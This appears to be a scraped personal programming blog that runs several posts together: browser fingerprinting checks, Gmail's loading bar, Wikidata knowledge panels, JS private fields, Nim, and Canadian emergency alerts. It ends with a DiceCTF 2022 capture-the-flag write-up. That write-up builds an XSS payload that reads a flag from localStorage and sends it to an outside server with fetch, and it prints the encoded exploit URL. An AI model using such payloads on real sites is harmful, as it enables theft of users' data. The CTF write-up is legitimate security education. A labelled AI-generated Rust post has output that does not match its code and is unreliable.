  • checks for these CSS properties: scroll-snap-coordinate flex-basis webkitMatchNearestMailBlockquoteColor MozOpacity textOverflow position columns msTextSizeAdjust animationDuration msImeAlign webkitBackgroundComposite MozTextAlignLast MozOsxFontSmoothing borderRightStyle webkitGridRow cssText parentRule webkitShapeOutside justifySelf isolation -moz-column-fill offsetRotation overflowWrap OAnimationFillMode borderRight border-inline-start-color webkitLineSnap MozPerspective touchAction enableBackground borderImageSource MozColumnFill webkitAnimationFillMode MozOSXFontSmoothing XvPhonemes length webkitFilter webkitGridAutoColumns
  • checks the stringification of native functions, and verifies some functions are implemented in native code (including performance.mark, and Function.prototype.toString itself)
  • attempts to get the width of the string mmmmmmmmmmlli in all of these fonts: "Ubuntu", "Utopia", "URW Gothic L", "Bitstream Charter", "FreeMono", "DejaVu Sans", "Droid Serif", "Liberation Sans", "Vrinda", "Kartika", "Sylfaen", "CordiaUPC", "Angsana New Bold Italic", "DFKai-SB", "Ebrima", "Lao UI", "Segoe UI Symbol", "Vijaya", "Roboto", "Apple Color Emoji", "Baskerville", "Marker Felt", "Apple Symbols", "Chalkboard", "Herculanum", "Skia", "Bahnschrift", "Andalus", "Yu Gothic", "Aldhabi", "Calibri Light"
  • checks various user agent properties in navigator
  • Listens to the voiceschanged event, and keeps track of what text-to-speech voices are available
  • Attempts to load chrome://browser/skin/feeds/feedIcon.png (I think this used to be an RSS icon in old Firefox versions)
  • checks for scripts injected into the page
  • checks availble video codecs and formats: 'video/mp4;codecs="avc1.42E01E, mp4a.40.2"', 'video/mp4;codecs="avc1.58A01E, mp4a.40.2"', 'video/mp4;codecs="avc1.4D401E, mp4a.40.2"', 'video/mp4;codecs="avc1.64001E, mp4a.40.2"', 'video/mp4;codecs="mp4v.20.8, mp4a.40.2"', 'video/mp4;codecs="mp4v.20.240, mp4a.40.2"', 'video/3gpp;codecs="mp4v.20.8, samr"', 'video/ogg;codecs="theora, vorbis"', 'video/ogg;codecs="theora, speex"', "audio/ogg;codecs=vorbis", "audio/ogg;codecs=speex", "audio/ogg;codecs=flac", 'video/ogg;codecs="dirac, vorbis"', 'video/x-matroska;codecs="theora, vorbis"', 'video/mp4; codecs="avc1.42E01E"', 'audio/mp4; codecs="mp4a.40.2"', 'audio/mpeg;codecs="mp3"', 'video/webm; codecs="vorbis,vp8"'
  • checks for window.$cdc_asdjflasutopfhvcZLmcfl_ (property used by Chrome Webdriver) (obfuscated as "$" + x.qKjBI("pqp") + "_" + x.qKjBI("nfqwsynfhgbcsuipMYzpsy") + "_")
  • gets WEBGL_debug_renderer_info, which contains GPU-specific info
  • tries to detect if IntersectionObserver returns correct data
  • checks what DRM solutions are available (although doesn’t actaully use them, this is what causes the DRM popup in Firefox): looks for Widevine, PlayReady, Clearkey, and Primetime
  • Attempts to load files stored in Chrome extension’s data (presumably to detect if they are installed):
chrome-extension://ianldemdppnbbojbafdkpdofceajhica/img/info.svg
chrome-extension://elfchnpigjboibngodkiamfemllklmge/img/info.svg
chrome-extension://npfnhmfcalmmkbpgkhjpdaiajfdhpndm/img/info.svg
chrome-extension://pfobdhfgohkddopcdbifhccbbpjlakaa/img/info.svg
chrome-extension://gfpioeglfjecbkeeomdidlndcagpbmj/img/info.svg
chrome-extension://mnbkfnehljejnebgbgfhdkmjicgmangi/img/info.svg
chrome-extension://adcggpckpldlkcobapimobdijchkigmb/img/info.svg
chrome-extension://poifgggpiofkbhafbjljpbbajafcjafi/img/info.svg
chrome-extension://plkjhgplpjlokmchnngcaeneiigkipeb/img/info.svg
chrome-extension://hhhpajpnecmhngfgkclokcghcpfgbape/img/info.svg
chrome-extension://cnncicmafnkgbonafdjnikijbhjkeink/img/info.svg
chrome-extension://aoeceebmempjbabimmnfkeeioccbjkea/img/info.svg
chrome-extension://pbclflhfplnkbgfokopkmjpejkokcaec/img/info.svg
chrome-extension://pogfikdkppcfejpknaclddnpcjjbalbn/img/info.svg
chrome-extension://mdjpmjaonahjbjncdlkjgeggjfdnnmme/img/info.svg
chrome-extension://cefomhonapiagddecgpooacpnoomabne/img/info.svg
chrome-extension://iokdapkmdldpeomcloobkajedcdleoib/img/info.svg
chrome-extension://cndipecijohebobplligphncocjamhei/content/images/icons/16.png
chrome-extension://lmpknllkkhpbfahgbkgjgopandmdbopi/blocked-notification-bar.html
chrome-extension://blddopfbnibgpgfeheedhjaheikanamn/img/128x128g.png
chrome-extension://nfjcghppefdfgmnblhgelkjhmljpndhh/img/icon16.png
  • checks if the source code of window.close (which is normally [native code]) contains ELECTRON
  • there is the string “haha jit go brrrrr”, as part of what appears to be some sort of either test for a JS engine bug or exploit
  • collects performance data
  • checks if Safari is creating a “Web clip” screenshot of the page

Gmail's fake loading indicator

By · · 2 minute read

Whenever I visit Gmail, I see its loading indicator for a fraction of a second before it loads:

A looping image of an envelope opening, with the text &ldquo;Loading Gmail&rdquo; below it

Here’s what it looks like when I artifically make my network connection dial-up speed, preventing Gmail from loading within a reasonable time (it would take several minutes for Gmail to actually load, but you couldn’t tell that from the loading bar):

A looping image of an envelope opening, with the text &ldquo;Loading Gmail&rdquo; below it. A loading bar appears, which fills up quickly at first, but then slows down, and eventually stops moving entirely.

Some investigation reveals that Gmail’s loading bar isn’t an actual loading bar! In fact, it’s progress is controlled by a CSS animation that makes it start fast, then slow down, then just stand still until Gmail is loaded. This defeats the point of a loading bar: it’s supposted to give an estimate of progress, not fill up at a rate entirely unrelated to actual loading!

How I improved this blog

By · · 3 minute read

I’ve recently made many improvements to this blog. This post will go into those changes, and how I implemented them.

Merging smitop.com and blog.smitop.com

Before these changes, I had two sites: smitop.com and blog.smitop.com. smitop.com was a pure static site, and blog.smitop.com was a static site generated with Hugo. Now, it’s just one site, smitop.com, generated with Hugo. All of the static content is in Hugo’s static directory. I use Cloudflare Workers. Here’s the worker script I use to redirect requests to the old blog.smitop.com domain to smitop.com. Since the URL structure for blog posts is the same, we just do a 301 redirect to the root domain with the same path:

addEventListener("fetch", event => {
  event.respondWith(handleRequest(event.request))
})

const ROOT = "https://smitop.com";

async function handleRequest(request) {
  try {
    const urlObj = new URL(request.url);
    return new Response("", {status: 301, headers: {location: ROOT + urlObj.pathname}});
  } catch (e) {
    return new Response("", {status: 301, headers: {location: ROOT}});
  }
}

There’s probably a way to do this without using Workers, but I decided to use Workers since they seem cool.

Styling

My blog has gone from almost completely unstyled, to fairly consistent styling. I use the Barlow font for headings, and Mukta Vaani for everything else. I use a custom Hugo theme I wrote just for this blog to give me complete control.

Deploys

While this hasn’t changed, I use Travis CI builds commits to master, and deploys them to Surge.

Open source

It’s open source now! I actually have two repos for this blog, a public one and a private one. The private one contains my unpublished blog posts and some other non-public things. I use GitHub Actions to sync the two repos automatically.

hugo

By · · 0 minute read

meta

By · · 0 minute read

Generating our own knowledge panels

By · · 7 minute read

Demo

Try entering a query and looking at the results! Wait a few seconds after entering your query, it might take a bit to load and update.

Explanation

I’ve had a lot of time on my hands recently (due to COVID-19). If you are an avid search engine user (you almost certainly are), then you’ll likely have seen a panel on the side of your search results that looks like this (this screenshot is of Google, but feel free to try these with your search engine of choice): Douglas Adams knowledge graph panel screenshot

But that’s not all! If we search for some specific fact about Douglas Adams, such as his height, Google is able to figure it out and tell it to us: Screenshot of Google&rsquo;s knowledge graph telling me that Douglas Adams height is 1.96 meters

How is Google able to figure this out? Google has a database with a bunch of facts in it, called their “knowledge graph”. Those facts are sometimes called triples, since they have three parts: for the above example, a subject: Douglas Adams, a predicate: height, and a object: 1.96 meters.

Aside: You might also hear about quads: they’re like triples, but the 4th part is the context, which identifies what database/graph the quad is a part of.

Google isn’t the first or only company to have a knowledge graph, however. Wolfram Alpha also has one. Bing also has one. Both are able to tell you Douglas Adams’s height. So, where do they get all of their data from?

While every knowledge graph has it’s differences (Wolfram Alpha’s is a lot more curated, for example), many of the facts in Google and Bing appear to be sourced from Wikidata. I could write a lot about Wikidata’s data model, but the simplifed version is that it’s a triplestore that anybody can edit, similar to Wikipedia. In fact, it’s run by the same Wikimedia Foundation that runs Wikipedia, and it’s possible with some template magic to include Wikidata facts into Wikidata. Triples, or statements as Wikidata refers to them, can also have references associated with them to identify what sources support a claim, and qualifiers to qualify a claim and add more detailed (for example, when a claim started being true).

Note: Wikidata isn’t the only source! I’m pretty sure Google uses DBpedia, and there are probably some proprietary datasets they pay for.

All of the structured data in Wikidata is licensed under CC0, which puts it in the public domain. As such, there’s no easy way to tell if Google uses Wikidata, since they don’t say anywhere, nor are the required to. There’s a hard way to tell, though! Comparing Google’s data to Wikidata shows that Google’s knowledge graph almost always has the exact same data as Wikidata. Also, Google’s knowledge graph occasionally reflects mistakes in Wikidata.

So, how can we access the data in Wikidata? The two main ways are the API, and the entity dumps. Wikidata’s API allows you programatically query and edit Wikidata. The entity dumps are just really big files that contain every statement in Wikidata, created around weekly. The all dump contains all statements in Wikidata, and is really big - over 2TB uncompressed (well that’s just an estimate, I don’t have enough storage to decompress the thing and find out the exact amount). The truthy dump is smaller, and just contains truthy statements, which are the most current/correct statements (Wikidata doesn’t just store statements that are currently true, but also things that have been true in the past, and things that are known to be wrong so bots don’t incorrectly re-add data known to be incorrect). truthy is just over 1TB in size uncompressed.

The data is available in multiple formats, but I use the JSON one, since it’s easier to parse in work with. The data dump is processed, and turned into a bunch of files, one for each entity. When data is needed about an entity, it’s file is just read from the file system. I’m effectively using the file system as a database. Also, it turns out that not all filesystem formats are able to handle millions of file in a directory very well. After my first failed attempt with ext4, I tried again with XFS, which works quite well (not that I’ve compared it to anything else).

When you type a query into the knowledge panel generator I showed at the beginning of the post, it has to search through tens of millions of possible entities’ names and aliases. The backend is implemented entirely in Rust. Optimizing this to work on a VPS without much RAM or compute power was a challenge. I’ve ended up using Rust’s BTreeMap to store all entity names and aliases into one big binary tree. However, this posed a problem at first: Wikidata items don’t all have unique names and aliases. The only unique identifier for a Wikidata item is it’s unique ID (Q219237, for example). There are many entities in Wikidata that share the same name, such as people who happen to have the same full name, or Q89 (apple, the fruit) and Q213710 (Apple, the record label). Since a BTreeMap can’t have two identical keys (they would just overwrite each other), I use a key of (String, usize). That’s a tuple where the first element is the normalized name of the entity, and the second is a unique number for each item.

When a query is made, I lookup the range of everything from the query text to the query with ZZ at the end. I’m effectively doing a prefix search across the binary tree.

Once all possible options are found, I try to generate infoboxes for all of them. Sometimes it fails to generate an infobox (for instance, because there are no triples that it knows how to handle), but otherwise it just inserts all of the triples it can handle into a box. The social media links just check against a few properties, and use SVG logos.

Of course, my knowledge panel isn’t perfect! It currently doesn’t display all of the parts of a location (it just does “London”, instead of “London, England”), and is missing support for many Wikidata properties. Hopefully I’ll be able to improve it in the future!

Thanks for reading! If you have any questions, comments, concerns, or inquiries feel free to email them to cogzap@speakscribe.com.

By the way, I wrote this post with Roam, it’s a pretty neat tool.

search

By · · 0 minute read

A bookmarklet to amplify YouTube

By · · 2 minute read

Want to amplify YouTube videos? Often when I’m watching one I’ll find it isn’t loud enough. That’s when I use this bookmarklet.

Drag this to your bookmarks bar, and use it on a YouTube video: Amplify YT

youtube

By · · 0 minute read

How to use private JS class variables

By · · 3 minute read

Private class variables in JavaScript

Private variables in JavaScript is gaining browser support. As I right this, it’s supported in ~63% of browsers. You can use the Babel plugin @babel/plugin-proposal-class-properties to transform it into cross-browser code, though. Let’s take a look at how you can use private variables in ES6 classes.

Private fields - basics

You can declare private fields in ES6 classes by prefixing the variable name with a #, like so:

class Counter {
  #value = 0;
  increase() {
    this.#value++;
  }
  value() {
    return this.#value;
  }
}

This class repersents a counter with a value that can only be increased. Here’s how you can use it:

const c = new Counter;
c.increase();
c.increase();
c.increase();
console.assert(c.value() === 3);

You can’t do any of these things, due to privacy rules which prevent any usage of private variables outside of the class declaration:

const c = new Counter;
c.#value = 3; // can't do since not in a class function
c.decrease = () => this.#value--; // can't do since not in class declaration

Private functions

You can make private functions too:

class Computer {
  #bios =    function () { /* ... */ }
  #loadRam = function () { /* ... */ }
  #loadOs =  function () { /* ... */ }
  turnOn() {
    this.#bios();
    this.#loadRam();
    this.#loadOs();
  }
}

You can call the turnOn method, but you can’t call #bios, #loadRam, or #loadOs by themselves. Private functions can also access private variables.

Variable without inital value

You can avoid setting an intial value by omitting the = ... part:

class Example {
  #private;
}

Static private variables

You can set static private variables, which can be used by static functions of the class, private functions of the class, and non-static methods:

class Example {
  static #password = "hunter1";
  
  // all of these functions return "hunter1"
  static #privateGetPassword = () => this.#password;
  static staticGetPassword() {
    return this.#password;
  }
  static privateGetPassword() {
    return this.#privateGetPassword();
  }
  getPassword() {
    return Example.#password;
  }
}

Square bracket notation doesn’t work

Confusingly, it’s possible to have two private variables that start with # in a class. Private variables cannot be accessed with square bracket notation (e.g. this['varName']), but if you attempt to do so you’ll be able to set a public variable that starts with #. This means that you can have two variables with the same name! Make sure you avoid square brackets when working with private variables, otherwise you’ll get some hard-to-fix bugs.

tutorial

By · · 0 minute read

alertready

By · · 0 minute read

AlertReady To Retire Ku Band Alerts

By · · 2 minute read

Pelmorex Inc., the company that runs Canada’s national emergency alerts system, AlertReady, has announced that they will stop broadcasting emergency alerts on the Ku satellite band.

Alert distributors will still be able to receive alerts through other methods, including C band satellite communication, a RSS feed, an Internet-based stream, and via an alert archive.

In an email to alert broadcasters, Pelmorex said that they were retiring the band due to Ku band signals “being used by very few LMDs (mainly as a backup connection)”. They will stop broadcasting on August 31, 2019.

canada

By · · 0 minute read

pelmorex

By · · 0 minute read

Easily upload files to IPFS, online

By · · 2 minute read

Need to upload files to IPFS quickly? With my new Upload2IPFS tool, you can upload files straight from your browser.

It uses Infura’s API to upload files. While Infura should pin the file to their node, it’s a good idea to pin them locally (the tool provides a command you can copy to do that), or with a pinning service.

The tool itself is hosted on CloudFlare’s IPFS gateway, which works really well for a simple static page. You can view the source code on GitHub.

Enjoy!

infura

By · · 0 minute read

ipfs

By · · 0 minute read

storage

By · · 0 minute read

frames

By · · 0 minute read

How to watch YouTube video frame-by-frame

By · · 2 minute read

Watching YouTube videos frame-by-frame can be done with just two keyboard shortcuts: . and ,.

First, pause the video. Otherwise this won’t work. Press , to go back one frame, and . to go forward one frame.

videos

By · · 0 minute read

Next Canada-wide emergency alert test announced for May 8

By · · 2 minute read

Pelmorex Corp, the corporation responsible for managing Canada’s AlertReady emergency alerts, has announced the dates for the next nationwide test alert: May 8.

The corporation announced the changes on their website, where they announced that the test alerts will be sent out across the country, around noon, local time.

A table of times of emergency alerts.

These alerts will played through Canada’s emergency alert infrastructure, including phones, TV shows, and radios.

The alerts are marked “Broadcast Intrusive”, meaning that they immediately interrupt television and radio programming to display the alert.

nim

By · · 0 minute read

Nim: How to use a cstringArray

By · · 3 minute read

The Nim system module (which is automatically into every Nim file) has a cstringArray type. However, it’s usage is a bit tricky to figure out, and there’s really no point in using for normal use. It’s really only useful for interfacing with C/C++/Objective-C libraries and wrappers.

cstringArrays are created by using the allocCStringArray proc in the system module. You must pass in a Nim openArray as the starting point of the cstringArray. If you want to start from a blank state, pass in a empty array:

var array = allocCStringArray([])
array[0] = "foo" # array is now ["foo"]

var invalidArray = allocCStringArray() # results in error

You can also start from an existing openArray:

var array = allocCStringArray(["bar"]) # array is ["bar"]
array[1] = "baz" # array is ["bar", "baz"]
array[0] = "quz" # array is ["qux", "baz"]

The easiest way to loop over the elements of a cstringArray is to convert it to a seq, and loop over that. Because Nim doesn’t keep track of the length of a cstringArray, you have to keep track of that some other way. Make sure you get the length right. If it’s too small, you won’t loop over all the elements. Too big, and you’ll results that can vary wildly: you might get empty strings, random data, or even crashes if you try to read past the end of the cstringArray.

var array = allocCStringArray(["corge", "waldo"])

for ele in cstringArrayToSeq(array, 2):
  echo ele # prints corge and waldo
  
for ele in cstringArrayToSeq(array, 1):
  echo ele # prints just corge
  
# DON'T DO THIS:
for ele in cstringArrayToSeq(array, 9999):
  echo ele # on my system, prints an error
  
# OR THIS:
for ele in cstringArrayToSeq(array, 3):
  echo ele # on my system, prints corge, waldo, then a blank line

Once you’re done with a cstringArray, make sure you de-allocate it, as I don’t think the GC does this for you automatically:

var array = allocCStringArray(["fred", "garply"])
deallocCStringArray(array)

blog

By · · 0 minute read

New Blog!

By · · 2 minute read

Welcome to my new blog. I’m still in the process of setting this up. I’m using Hugo + Forestry + Travis CI to have an automated CMS -> static site pipeline.

About

By · · 2 minute read

I’m interested in programming and technology. This is my personal website. I have done lots of things that I find interesting; see my homepage for a comprehensive list. I also document some of the things I use to do my computing. Some of the things I am particularly interested in are:

  • The Rust programming language, which is a programming language with very different design desicisons from most other mainstream languages. I have made some contributions to rustc, the reference compiler (and presently the only complete one).
  • Free/open-source smartphones, such as the Pinephone, which are phones that can run software that is almost entirely FOSS. I find it really cool being able to use my phone as though it were any other device I can SSH into, and being able to send and recieve texts and phone calls from the command line is really cool, albeit not very useful.
  • Stochastic time tracking, which is a time tracking system that randomly samples what one is doing. I am the author of TagTime Web, which is FOSS web-based software that does exactly this, and is quite featureful.
  • The color cyan, it is my favourite color.

Feel free to contact me by emailing notme@smitop.com, or one of the many other ways to contact me.

Accounts on various services

By · · 2 minute read

Email to notme@smitop.com is the best way to reach me, do feel free to contact me. Keep in mind that I don’t actively use all of these accounts.

Email

  • notme@smitop.com is my preferred address
  • smitop2@gmail.com also works if the previous email doesn’t work for you

Programming

Social media

Chat

Other websites

AI generation: Panics in Rust

By · · 3 minute read

(j1-jumbo, temperature = 0.7)

Let’s look at a simple function that panics:

fn main() -> Result<(), String> {
    let mut buffer = vec![];
    let mut vec = vec![];
    buffer.push("hello".to_string());
    vec.push(&mut buffer[0]);
    panic!("XXX");
}

If I compile and run this program, it will panic and print an error message:

thread 'main' panicked at 'XXX', src/main.rs:5:21

The error message is pretty clear. The panic happened on line 5, and the error was "XXX". It doesn’t matter what XXX means, at least something isn’t right.

Wait a minute…

Actually, that’s not actually all that helpful. The error message is just the panic message, and that’s all it says. But, panics are supposed to say what went wrong. Let’s try forcing a panic and see what we get:

fn main() -> Result<(), String> {
    let mut buffer = vec![];
    let mut vec = vec![];
    buffer.push("hello".to_string());
    vec.push(&mut buffer[0]);
    panic!("XXX");
}
thread 'main' panicked at 'XXX', src/main.rs:5:21

Wow, that sure is unhelpful. The error message is exactly the same, and XXX isn’t very helpful either.

Let’s try some prints

In order to figure out what is going wrong, let’s add logging statements to our program. It will be helpful to see the values of the variables we are working with when the panic happens.

fn main() -> Result<(), String> {
    let mut buffer = vec![];
    let mut vec = vec![];
    buffer.push("hello".to_string());
    vec.push(&mut buffer[0]);
    println!("buffer: {}\nvec: {}", buffer, vec);
    panic!("XXX");
}
thread 'main' panicked at 'XXX', src/main.rs:5:21
buffer: [hello]
vec: [hello]

This is a lot more helpful.

Certificate Transparency stats

By · · 2 minute read

As of Feburary 17, 2022

An “active log” is a log that contains unexpired certificates. Specifically, it includes current and future shards of annually sharded logs, and non-sharded logs that are not retired and have accepted new certificates for inclusion in the last 825 days1.

Count
Certificates in active logs 6,379,773,981
Certificates in non-retired logs 10,425,597,824
Certificates in Google logs 7,634,811,567
Certificates in active Google logs 4,767,725,831

  1. A previous version of the Baseline Rules required that certificates be limited to a 825 day validity period. As of Sept. 1, 2020 this has been reduced but there are still unexpired certificates from before this change. On Dec. 6, 2022 this will change to 398 days as the last certificate with a 825 day lifespan expires. ↩︎

DiceCTF 2022: blazingfast

By · · 6 minute read

One of the challenges in DiceCTF 2022 was web/blazingfast. It converts text you write InTo tExT LiKe tHiS. The main logic is implemented in WebAssembly, but the C source code is provided1. If we try to input an XSS payload, it detects this and the output is No XSS for you!.

There is an admin bot that will visit a URI you specify with a flag in localStorage, and we can use the demo URI parameter to make the admin mock text of our choosing.

Capitalization is one of those things that seems simple if you approach it from an ASCII-centric perspective, but capitalization works in weird ways in some languages. In German, “ß” in lowercase is “SS” in uppercase. Some precomposed ligatures have similar behavior: “ffi” (that’s a single letter) uppercases to “FFI” (that’s three letters). Let’s see how this challenge handles those characters: ßßßßß gets mocked incorrectly as SsSsSSSSSS. The last half of the input didn’t get mocked!

The unmocked second half is due to a mismatch length handling in the WASM glue code. It starts by sending the length of the string to the WASM module. Next, it converts the string to all uppercase, since the WASM module works by lowercasing the appropriate letters — it assumes the input is already all uppercase. This means that the rest of the string isn’t mocked. This is great for us, since the loop that mocks the string also has an XSS check: buf[i] == '<' || buf[i] == '>' || buf[i] == '&' || buf[i] == '"'. This would be an effective check if it were run against every character. But since it isn’t, we can stick an XSS payload at the end.

There’s one problem with our XSS payload though: it gets converted to all uppercase. We need to write an XSS payload that doesn’t use any lowercase letters. I later learned that you could do this pretty easily with escape sequences, but I did this a more convoluted way. It is possible to execute arbitrary JavaScript payloads using only symbols. JSFuck can transpile any JavaScript to JavaScript with just six symbols. Unfortunately, the generated JS is often very long, and there is a length limit of 1000 characters in the WASM glue code. As such, my solution is based on what JSFuck does, but takes advantage of more characters.

Here, we create a bunch of single character variables using things createable without letters. We can use ''+!0 to get "false", ''+!1 for "true", [][0]+'', for "undefined", then extract characters by indexing into those strings. We can use those characters to access parts of objects to get even more strings available to index from. Note that this relies on native functions being stringified in specific ways, so this is Chromium-specific.

UN=[][0]+'';FL=(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]];F=([][FL]+'');
C=F[3];O=F[27];N=UN[1];S=(''+!1)[3];T=F[21];R=(!0+'')[1];U=UN[0];E=F[29];L=(!1+'')[2];A=(!1+'')[1];
CON=C+O+N+S+T+R+U+C+T+O+R;
G=(''+''[CON])[14];F=F[0];M=((0)[CON]+'')[11];H=(+(101))[T+O+''[CON][N+A+M+E]](21)[1];

Next, we need to access two globals: localStorage which has the flag, and fetch to send data to our server. We can’t directly index on window (since that’s spelt with lowercase letters). We can get the Function global by getting the constructor property on a function we create. Then we can pass a string to Function to create a function with the contents of that string (similar to eval), then call that new function. We can access globals that way:

FN=(()=>{})[CON];
[LS,FE]=FN(R+E+T+U+R+N+' ['+L+O+C+A+L+'S'+T+O+R+A+G+E+','+F+E+T+C+H+']')();

Next, we extract the flag from localStorage and send it to our server. Conveniently the hostname and protocol of URLs are case-insensitive.

FE('HTTPS://BOX.SMITOP.COM/'+LS[F+L+A+G]);

Now we’ve got our JavaScript, let’s format it into an exploit URI. We URL-encode the script and put it into an image tag after 500 ßs: https://blazingfast.mc.ax/?demo=[500 ß]<IMG SRC="" ONERROR="[script]">. This gives us our final URI to send to the admin bot:

https://blazingfast.mc.ax/?demo=%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%3CIMG%20SRC=%22%22%20ONERROR=%22UN%3D%5B%5D%5B0%5D%2B%27%27%3BFL%3D(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%3BF%3D(%5B%5D%5BFL%5D%2B%27%27)%3BC%3DF%5B3%5D%3BO%3DF%5B27%5D%3BN%3DUN%5B1%5D%3BS%3D(%27%27%2B!1)%5B3%5D%3BT%3DF%5B21%5D%3BR%3D(!0%2B%27%27)%5B1%5D%3BU%3DUN%5B0%5D%3BE%3DF%5B29%5D%3BL%3D(!1%2B%27%27)%5B2%5D%3BA%3D(!1%2B%27%27)%5B1%5D%3BCON%3DC%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR%3BG%3D(%27%27%2B%27%27%5BCON%5D)%5B14%5D%3BF%3DF%5B0%5D%3BM%3D((0)%5BCON%5D%2B%27%27)%5B11%5D%3BH%3D(%2B(101))%5BT%2BO%2B%27%27%5BCON%5D%5BN%2BA%2BM%2BE%5D%5D(21)%5B1%5D%3BFN%3D(()%3D%3E%7B%7D)%5BCON%5D%3B%5BLS%2CFE%5D%3DFN(R%2